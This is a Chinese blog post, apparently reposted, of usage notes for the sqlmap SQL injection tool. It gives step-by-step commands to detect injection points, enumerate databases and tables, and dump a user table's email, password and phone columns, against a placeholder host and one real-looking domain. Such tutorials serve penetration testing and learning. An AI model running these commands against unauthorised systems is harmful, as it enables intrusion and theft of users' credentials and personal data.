渗透神器sqlmap的使用笔记
来源:互联网 发布:汽车单片机 编辑:程序博客网 时间:2024/04/29 15:18
0x00前言
sqlmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。该开源软件是国外大神的慷慨赠予。在乌云、补天等等漏洞公开平台,随处可见它的身影,也是渗透人员的必备神器。能够把这神器灵活运用,也是很厉害的一件事情。熟能生巧!!
下载地址:https://github.com/sqlmapproject/sqlmap#最快的使用,不过有点麻烦咯
集成环境:http://pan.baidu.com/s/1hssCKQS#Appie 里面安装了sqlmap
集成系统:https://www.kali.org/downloads/#kali-Linux下安装有sqlmap
0x01 发现注入点
强调:sqlmap 并不擅长发现注入点,所以必须通过其他方式发现注入点。这些方式有:使用AWVS 进行漏扫、APPSCAN漏扫、burpsuite进行检测、手工挖掘(经验很重要),因为本文重点是介绍在发现注入点之后的工作,所以不对如何发现注入点进行详细介绍。我们需要使用txt文本来记录下注入点的地址和数据。作为后面参数的输入。
0x02 检测注入点
sqlmap -u "http://www.XXX.cn/ldxx/ldxx.PHP?pid=7" --random-agent
实践1 : 因为众多的原因,测试过程会出现很多的 “ [Y/n] ” 之类的提示。我们可以附加参数 --batch
sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --random-agent --batch
实践2 :为了加快速度和增加检测的多样性
sqlmap -u "http://www.XXX.cn:80/ldxx/ldxx.php?pid=7" --data="item=1" --level=5 --risk=3 --ignore-proxy --delay=2 --timeout=60 --threads=6
实践3:进行表单数据注入
sqlmap -u "http://www.XXX.cn/admins" --forms
实践4:当我们进行手机服务端的注入时
sqlmap -u "http://www.ahujhc.cn:80/ldxx/ldxx.php?pid=7" --mobile --time-sec=30
实践5:使用文本导入数据
sqlmap -r E:\temporary\www.XXX.cn.txt --random-agent --batch --level=3 --risk=3 --timeout=60 --threads=3 --ignore-proxy --delay=2
0x03 暴力破解数据库名称和数目
sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --dbs --thread=3
实践1: 可以附加的参数为: --union-cols=1-30 --union-char=NULL,CHAR
sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --dbs --thread=3 --union-cols=1-30 --union-char=NULL,CHAR
实践2:列出web当前使用的数据库
sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --current-db
实践3:尽可能详细的信息
sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" -b --current-db --privileges --is-dba --current user --roles --users --hostname --passwords --comments -v 0
0x04 暴力破解一个数据库中的所有表
$ sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --thread=6 -D jhxy2 --tables
0x05 读取某个数据库中个某表的所有列
$ sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --thread=6 -D jhxy2 -T web_user --columns
0x06 读取列中的具体内容
sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --thread=6 -D jhxy2 -T web_user -C "Email,Password,Tel,Uname,Username" --dump
实践1 :如果数据过大,可以抽取一部分数据
sqlmap -u "http://www.XXX.cn:80/ldxx/ldxx.php?pid=7" -D jhxy2 -T web_user -C" Email,Password,Tel,Uname,Username" --start=1 --stop=10 --dump
- 渗透神器sqlmap的使用笔记
- 渗透神器sqlmap的使用笔记
- SQLMAP渗透笔记之file参数的使用
- SQLMAP注入神器笔记
- SQLMAP渗透笔记之交互写shell及命令执行(即os参数的使用)
- 安卓使用Termux做渗透测试(演示sqlmap安装,并附上一个神器)
- Sqlmap渗透
- SQLMAP渗透笔记之Cookie中转注入
- SQLMAP渗透笔记之MSSQL数据库注入
- SQLMAP渗透笔记之Mysql Dos攻击
- SQLMAP渗透笔记之MySQL数据库注入
- SQLMAP渗透笔记之请求延时
- SQLMAP渗透笔记之绕过WAF防火墙
- [渗透测试]Sqlmap使用参数说明
- 安卓渗透神器dsploit笔记
- sqlmap使用笔记
- sqlmap使用笔记
- sqlmap使用笔记
- 程序员修炼之道-读书笔记
- [OpenGL]从零开始写一个Android平台下的全景视频播放器——5.5 响应用户的多指触控事件(缩放)
- 常见排序算法性能测试
- HDOJ1000A + B Problem
- JavaEE复习笔记(5)——Struts:MVC思想和Struts2的配置
- 渗透神器sqlmap的使用笔记
- Partition List
- HDOJ1001 Sum Problem
- 战斗死亡结算
- Struts2学习总结
- HDOJ1089 A+B for Input-Output Practice (I)
- PAT甲级1020
- 2.10 stack
- 分数线划定